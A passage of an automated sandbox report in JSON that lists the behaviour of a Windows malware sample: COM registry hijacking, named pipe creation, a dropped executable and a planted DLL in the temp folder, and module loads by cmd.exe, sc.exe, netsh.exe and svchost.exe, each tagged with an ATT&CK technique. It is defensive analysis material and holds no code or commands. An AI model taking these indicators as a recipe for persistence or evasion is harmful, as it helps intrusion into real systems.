Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75470000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 75030000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00006128)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"GDI32.DLL\" at base 77ba0000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75c90000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71150000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"KERNEL32\" at base 77360000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d370000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"KERNEL32.DLL\" at base 77360000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"WS2_32.DLL\" at base 75cb0000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"DBGHELP.DLL\" at base 6f9b0000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"USER32.DLL\" at base 777e0000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"ADVAPI32.DLL\" at base 75cf0000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"SHELL32.DLL\" at base 76660000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"OLEAUT32.DLL\" at base 77440000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"MSVCR100.DLL\" at base 6c440000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"NTDLL.DLL\" at base 77a50000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"OLE32.DLL\" at base 76500000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"CRYPTBASE.DLL\" at base 75850000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74730000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"PROPSYS.DLL\" at base 743e0000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"COMCTL32.DLL\" at base 74820000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"APPHELP.DLL\" at base 75800000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"CLBCATQ.DLL\" at base 75f40000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6aa90000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77360000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"SETUPAPI.DLL\" at base 778b0000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"RPCRT4.DLL\" at base 77bf0000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 743e0000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"NTMARTA.DLL\" at base 74dc0000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76300000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"PROFAPI.DLL\" at base 75960000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75a60000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75da0000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"SECUR32.DLL\" at base 75690000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 759a0000\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75800000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71150000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 77360000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 77ba0000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75c90000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71150000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 77360000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d370000\n \"hdvvshgu.exe\" loaded module \"KERNEL32.DLL\" at base 77360000\n \"hdvvshgu.exe\" loaded module \"WS2_32.DLL\" at base 75cb0000\n \"hdvvshgu.exe\" loaded module \"DBGHELP.DLL\" at base 6f9b0000\n \"hdvvshgu.exe\" loaded module \"USER32.DLL\" at base 777e0000\n \"hdvvshgu.exe\" loaded module \"ADVAPI32.DLL\" at base 75cf0000\n \"hdvvshgu.exe\" loaded module \"SHELL32.DLL\" at base 76660000\n \"hdvvshgu.exe\" loaded module \"OLEAUT32.DLL\" at base 77440000\n \"hdvvshgu.exe\" loaded module \"MSVCR100.DLL\" at base 6c440000\n \"hdvvshgu.exe\" loaded module \"SSPICLI.DLL\" at base 757e0000\n \"hdvvshgu.exe\" loaded module \"RPCRT4.DLL\" at base 77bf0000\n \"hdvvshgu.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76300000\n \"hdvvshgu.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75800000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 6df80000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6d290000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 77360000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6cf10000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6c680000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 6c5c0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77360000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6c430000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 6b8e0000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6c2e0000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6c240000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6c190000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6be00000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 6b8a0000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 6a800000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 77bf0000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 6a6e0000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6d2d0000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 6a2c0000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 6a1e0000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 6c100000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 6a130000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 76500000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75850000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74730000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 75360000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 777e0000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 75f40000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c8a0000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 75cf0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 76300000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 76300000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 76300000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76300000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 750f0000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 758f0000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6fef0000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75980000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74f30000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 75030000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 77440000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71150000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 77360000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d370000\n \"svchost.exe\" loaded module \"NTDLL.DLL\" at base 77a50000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73cc0000\n \"svchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 73ae0000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 77bf0000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73bd0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73fe0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73990000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76300000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73850000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75320000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 751e0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73970000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 75cb0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73bf0000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 720a0000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 757e0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76300000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74e80000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004580)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004648)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004648)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004648)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004648)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005332)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005332)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005332)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005332)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005332)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005332)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005808)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005808)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005808)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005808)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005808)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005808)\n \"hdvvshgu.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005776)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004152)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006128)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006128)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006128)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006128)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00006128)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00006128)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00006128)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006128)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00006128)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006128)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hdvvshgu.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" file has an entrypoint instructions - 